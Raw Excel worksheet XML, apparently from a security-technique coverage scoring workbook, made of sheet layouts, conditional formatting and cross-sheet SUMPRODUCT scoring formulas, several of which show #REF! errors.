  <conditionalFormatting sqref="E61 G48:U60 F48:F63 E48:E54 E24:S47 A24:D45 A46:A60 C46:D54 C55:E60 B46:B61 A2:U23">
    <cfRule type="expression" dxfId="6" priority="2">
      <formula>B2=""</formula>
    </cfRule>
    <cfRule type="expression" dxfId="5" priority="3">
      <formula>B2=0</formula>
    </cfRule>
    <cfRule type="expression" dxfId="4" priority="4">
      <formula>B2=5</formula>
    </cfRule>
    <cfRule type="expression" dxfId="3" priority="5">
      <formula>B2=2</formula>
    </cfRule>
    <cfRule type="expression" dxfId="2" priority="6">
      <formula>B2=4</formula>
    </cfRule>
    <cfRule type="expression" dxfId="1" priority="7">
      <formula>B2=1</formula>
    </cfRule>
    <cfRule type="expression" dxfId="0" priority="8">
      <formula>B2=3</formula>
    </cfRule>
  </conditionalFormatting>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A90F0-647A-4356-BB80-CF3562B6A0A5}">
  <dimension ref="A1:A14"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="A13" sqref="A13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A1" t="s">
        <v>1203</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A2" t="s">
        <v>1204</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A3" t="s">
        <v>1205</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A4" t="s">
        <v>1206</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A5" t="s">
        <v>1207</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A6" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A7" t="s">
        <v>1209</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A8" t="s">
        <v>1210</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A9" t="s">
        <v>1211</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A10" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A11" t="s">
        <v>1213</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A12" t="s">
        <v>1214</v>
      </c>
    </row>
    <row r="13" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A13" t="s">
        <v>1215</v>
      </c>
    </row>
    <row r="14" spans="1:1" x14ac:dyDescent="0.45">
      <c r="A14" t="s">
        <v>1216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
  <sheetViews>
    <sheetView showGridLines="0" topLeftCell="C6" zoomScale="50" zoomScaleNormal="50" zoomScalePageLayoutView="50" workbookViewId="0">
      <selection activeCell="B7" sqref="B7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.86328125" defaultRowHeight="23.25" x14ac:dyDescent="0.7"/>
  <cols>
    <col min="1" max="1" width="14.265625" style="7" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="10.3984375" style="7" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="88" style="7" customWidth="1"/>
    <col min="4" max="4" width="88" style="33" customWidth="1"/>
    <col min="5" max="7" width="88" style="7" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="25.5" x14ac:dyDescent="0.75">
      <c r="A1" s="29"/>
      <c r="B1" s="29"/>
      <c r="C1" s="34" t="s">
        <v>229</v>
      </c>
      <c r="D1" s="35" t="s">
        <v>230</v>
      </c>
      <c r="E1" s="67" t="s">
        <v>231</v>
      </c>
      <c r="F1" s="67"/>
      <c r="G1" s="67"/>
    </row>
    <row r="2" spans="1:7" ht="25.5" x14ac:dyDescent="0.75">
      <c r="A2" s="36" t="s">
        <v>232</v>
      </c>
      <c r="B2" s="37" t="s">
        <v>233</v>
      </c>
      <c r="C2" s="31" t="s">
        <v>234</v>
      </c>
      <c r="D2" s="38" t="s">
        <v>235</v>
      </c>
      <c r="E2" s="39" t="s">
        <v>236</v>
      </c>
      <c r="F2" s="39" t="s">
        <v>237</v>
      </c>
      <c r="G2" s="39" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="177.95" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A3" s="40" t="s">
        <v>239</v>
      </c>
      <c r="B3" s="32">
        <v>0</v>
      </c>
      <c r="C3" s="41" t="s">
        <v>240</v>
      </c>
      <c r="D3" s="42" t="s">
        <v>241</v>
      </c>
      <c r="E3" s="41" t="s">
        <v>242</v>
      </c>
      <c r="F3" s="41" t="s">
        <v>242</v>
      </c>
      <c r="G3" s="41" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="197.1" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A4" s="43" t="s">
        <v>243</v>
      </c>
      <c r="B4" s="32">
        <v>1</v>
      </c>
      <c r="C4" s="42" t="s">
        <v>244</v>
      </c>
      <c r="D4" s="42" t="s">
        <v>245</v>
      </c>
      <c r="E4" s="41" t="s">
        <v>246</v>
      </c>
      <c r="F4" s="41" t="s">
        <v>247</v>
      </c>
      <c r="G4" s="41" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="5" spans="1:7" ht="189" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A5" s="44" t="s">
        <v>249</v>
      </c>
      <c r="B5" s="32">
        <v>2</v>
      </c>
      <c r="C5" s="41" t="s">
        <v>250</v>
      </c>
      <c r="D5" s="42" t="s">
        <v>251</v>
      </c>
      <c r="E5" s="41" t="s">
        <v>252</v>
      </c>
      <c r="F5" s="41" t="s">
        <v>253</v>
      </c>
      <c r="G5" s="41" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="6" spans="1:7" ht="189.95" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A6" s="45" t="s">
        <v>255</v>
      </c>
      <c r="B6" s="32">
        <v>3</v>
      </c>
      <c r="C6" s="41" t="s">
        <v>256</v>
      </c>
      <c r="D6" s="42" t="s">
        <v>257</v>
      </c>
      <c r="E6" s="41" t="s">
        <v>258</v>
      </c>
      <c r="F6" s="41" t="s">
        <v>259</v>
      </c>
      <c r="G6" s="41" t="s">
        <v>260</v>
      </c>
    </row>
    <row r="7" spans="1:7" ht="290.10000000000002" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A7" s="46" t="s">
        <v>261</v>
      </c>
      <c r="B7" s="32">
        <v>4</v>
      </c>
      <c r="C7" s="41" t="s">
        <v>262</v>
      </c>
      <c r="D7" s="42" t="s">
        <v>263</v>
      </c>
      <c r="E7" s="41" t="s">
        <v>264</v>
      </c>
      <c r="F7" s="41" t="s">
        <v>265</v>
      </c>
      <c r="G7" s="41" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="8" spans="1:7" ht="243" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A8" s="47" t="s">
        <v>267</v>
      </c>
      <c r="B8" s="32">
        <v>5</v>
      </c>
      <c r="C8" s="41" t="s">
        <v>268</v>
      </c>
      <c r="D8" s="42" t="s">
        <v>269</v>
      </c>
      <c r="E8" s="41" t="s">
        <v>270</v>
      </c>
      <c r="F8" s="41" t="s">
        <v>271</v>
      </c>
      <c r="G8" s="41" t="s">
        <v>272</v>
      </c>
    </row>
  </sheetData>
  <customSheetViews>
    <customSheetView guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" scale="50" showGridLines="0">
      <selection activeCell="C5" sqref="C5"/>
      <pageMargins left="0" right="0" top="0" bottom="0" header="0" footer="0"/>
      <pageSetup orientation="portrait" r:id="rId1"/>
    </customSheetView>
  </customSheetViews>
  <mergeCells count="1">
    <mergeCell ref="E1:G1"/>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showGridLines="0" zoomScale="95" zoomScaleNormal="95" zoomScalePageLayoutView="95" workbookViewId="0">
      <selection activeCell="N6" sqref="N6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.86328125" defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="13.265625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="18.1328125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="28.73046875" customWidth="1"/>
    <col min="4" max="4" width="27.59765625" customWidth="1"/>
    <col min="5" max="5" width="32.59765625" customWidth="1"/>
    <col min="6" max="6" width="18.1328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="29" customWidth="1"/>
    <col min="8" max="10" width="18.1328125" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="32.3984375" customWidth="1"/>
    <col min="12" max="12" width="19.86328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="29.1" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A1" s="48" t="s">
        <v>273</v>
      </c>
      <c r="B1" s="60" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="60" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="60" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="60" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="60" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="60" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="60" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="60" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="60" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="60" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="60" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A2" s="61" t="s">
        <v>274</v>
      </c>
      <c r="B2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!B$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!B$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="C2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!C$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!C$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="D2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!D$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$170&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$170)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!D$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$170&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="E2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!E$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!E$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="F2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!F$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!F$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="G2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!G$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!G$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="H2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!H$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!H$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="I2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!I$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!I$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="J2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!J$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!J$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="K2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!K$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!K$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
      <c r="L2" s="59">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!L$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0,'Detailed Techniques'!$K$2:$K$220)/SUMPRODUCT(ISNUMBER(SEARCH(""&amp;Trends!L$1&amp;","," "&amp;'Detailed Techniques'!$B$2:$B$220&amp;",",1))+0)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <customSheetViews>
    <customSheetView guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" scale="154" showGridLines="0" topLeftCell="C5">
      <selection activeCell="K2" sqref="K2"/>
      <pageMargins left="0" right="0" top="0" bottom="0" header="0" footer="0"/>
    </customSheetView>
  </customSheetViews>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10"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScaleNormal="100" zoomScalePageLayoutView="120" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H2" sqref="H2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.86328125" defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="15" style="14" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.1328125" style="14" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="5.73046875" style="26" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="67.59765625" style="1" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="45.265625" style="13" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="38.1328125" style="23" customWidth="1"/>
    <col min="7" max="7" width="8.59765625" style="1" customWidth="1"/>
    <col min="8" max="8" width="13" style="50" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="24.59765625" style="50" customWidth="1"/>
    <col min="10" max="10" width="12.265625" style="50" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="9.59765625" style="50" bestFit="1" customWidth="1"/>
    <col min="12" max="13" width="17.59765625" hidden="1" customWidth="1"/>
    <col min="14" max="14" width="22.1328125" hidden="1" customWidth="1"/>
    <col min="15" max="15" width="5.265625" hidden="1" customWidth="1"/>
    <col min="16" max="16" width="3.1328125" hidden="1" customWidth="1"/>
    <col min="17" max="17" width="4.265625" hidden="1" customWidth="1"/>
    <col min="18" max="19" width="5.1328125" hidden="1" customWidth="1"/>
    <col min="20" max="20" width="3.1328125" hidden="1" customWidth="1"/>
    <col min="21" max="21" width="4.265625" hidden="1" customWidth="1"/>
    <col min="22" max="22" width="5.1328125" hidden="1" customWidth="1"/>
    <col min="23" max="23" width="6.265625" hidden="1" customWidth="1"/>
    <col min="24" max="24" width="4.1328125" hidden="1" customWidth="1"/>
    <col min="25" max="25" width="5.265625" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:25" s="52" customFormat="1" x14ac:dyDescent="0.45">
      <c r="A1" s="53" t="s">
        <v>275</v>
      </c>
      <c r="B1" s="53" t="s">
        <v>276</v>
      </c>
      <c r="C1" s="53" t="s">
        <v>277</v>
      </c>
      <c r="D1" s="53" t="s">
        <v>278</v>
      </c>
      <c r="E1" s="53" t="s">
        <v>279</v>
      </c>
      <c r="F1" s="53" t="s">
        <v>280</v>
      </c>
      <c r="G1" s="53" t="s">
        <v>281</v>
      </c>
      <c r="H1" s="54" t="s">
        <v>231</v>
      </c>
      <c r="I1" s="54" t="s">
        <v>230</v>
      </c>
      <c r="J1" s="54" t="s">
        <v>229</v>
      </c>
      <c r="K1" s="54" t="s">
        <v>282</v>
      </c>
      <c r="L1" s="53" t="s">
        <v>283</v>
      </c>
      <c r="M1" s="53" t="s">
        <v>284</v>
      </c>
      <c r="N1" s="53" t="s">
        <v>285</v>
      </c>
      <c r="O1" s="53" t="s">
        <v>286</v>
      </c>
      <c r="P1" s="53" t="s">
        <v>287</v>
      </c>
      <c r="Q1" s="53" t="s">
        <v>288</v>
      </c>
      <c r="R1" s="53" t="s">
        <v>289</v>
      </c>
      <c r="S1" s="53" t="s">
        <v>290</v>
      </c>
      <c r="T1" s="53" t="s">
        <v>291</v>
      </c>
      <c r="U1" s="53" t="s">
        <v>292</v>
      </c>
      <c r="V1" s="53" t="s">
        <v>293</v>
      </c>
      <c r="W1" s="53" t="s">
        <v>294</v>
      </c>
      <c r="X1" s="53" t="s">
        <v>295</v>
      </c>
      <c r="Y1" s="53" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="2" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A2" s="8" t="s">
        <v>78</v>
      </c>
      <c r="B2" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C2" s="8" t="s">
        <v>297</v>
      </c>
      <c r="D2" s="10" t="s">
        <v>298</v>
      </c>
      <c r="E2" s="9" t="s">
        <v>299</v>
      </c>
      <c r="F2" s="10" t="s">
        <v>300</v>
      </c>
      <c r="G2" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K2,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H2" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I2" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J2" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K2" s="51">
        <f t="shared" ref="K2:K65" si="0">FLOOR(AVERAGE(H2:J2),1)</f>
        <v>0</v>
      </c>
      <c r="L2" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M2" s="18" t="str">
        <f>IF(L2&lt;0.2,"0-20",IF(L2&lt;0.4,"20-40",IF(L2&lt;0.6,"40-60",IF(L2&lt;0.8,"60-80","80-100"))))</f>
        <v>0-20</v>
      </c>
      <c r="N2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O2" s="18" t="e">
        <f>IF(N2&lt;0.2,"0-20",IF(N2&lt;0.4,"20-40",IF(N2&lt;0.6,"40-60",IF(N2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="P2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q2" s="18" t="e">
        <f>IF(P2&lt;0.2,"0-20",IF(P2&lt;0.4,"20-40",IF(P2&lt;0.6,"40-60",IF(P2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="R2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S2" s="18" t="e">
        <f>IF(R2&lt;0.2,"0-20",IF(R2&lt;0.4,"20-40",IF(R2&lt;0.6,"40-60",IF(R2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="T2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U2" s="18" t="e">
        <f>IF(T2&lt;0.2,"0-20",IF(T2&lt;0.4,"20-40",IF(T2&lt;0.6,"40-60",IF(T2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="V2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W2" s="18" t="e">
        <f>IF(V2&lt;0.2,"0-20",IF(V2&lt;0.4,"20-40",IF(V2&lt;0.6,"40-60",IF(V2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="X2" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F2&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F2))-LEN(SUBSTITUTE(TRIM(F2),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y2" s="18" t="e">
        <f>IF(X2&lt;0.2,"0-20",IF(X2&lt;0.4,"20-40",IF(X2&lt;0.6,"40-60",IF(X2&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="3" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A3" s="8" t="s">
        <v>27</v>
      </c>
      <c r="B3" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>301</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>302</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>303</v>
      </c>
      <c r="F3" s="10" t="s">
        <v>304</v>
      </c>
      <c r="G3" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K3,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H3" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I3" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J3" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K3" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L3" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M3" s="18" t="str">
        <f t="shared" ref="M3:M66" si="1">IF(L3&lt;0.2,"0-20",IF(L3&lt;0.4,"20-40",IF(L3&lt;0.6,"40-60",IF(L3&lt;0.8,"60-80","80-100"))))</f>
        <v>0-20</v>
      </c>
      <c r="N3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O3" s="18" t="e">
        <f t="shared" ref="O3:O66" si="2">IF(N3&lt;0.2,"0-20",IF(N3&lt;0.4,"20-40",IF(N3&lt;0.6,"40-60",IF(N3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="P3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q3" s="18" t="e">
        <f t="shared" ref="Q3:Q66" si="3">IF(P3&lt;0.2,"0-20",IF(P3&lt;0.4,"20-40",IF(P3&lt;0.6,"40-60",IF(P3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="R3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S3" s="18" t="e">
        <f t="shared" ref="S3:S66" si="4">IF(R3&lt;0.2,"0-20",IF(R3&lt;0.4,"20-40",IF(R3&lt;0.6,"40-60",IF(R3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="T3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U3" s="18" t="e">
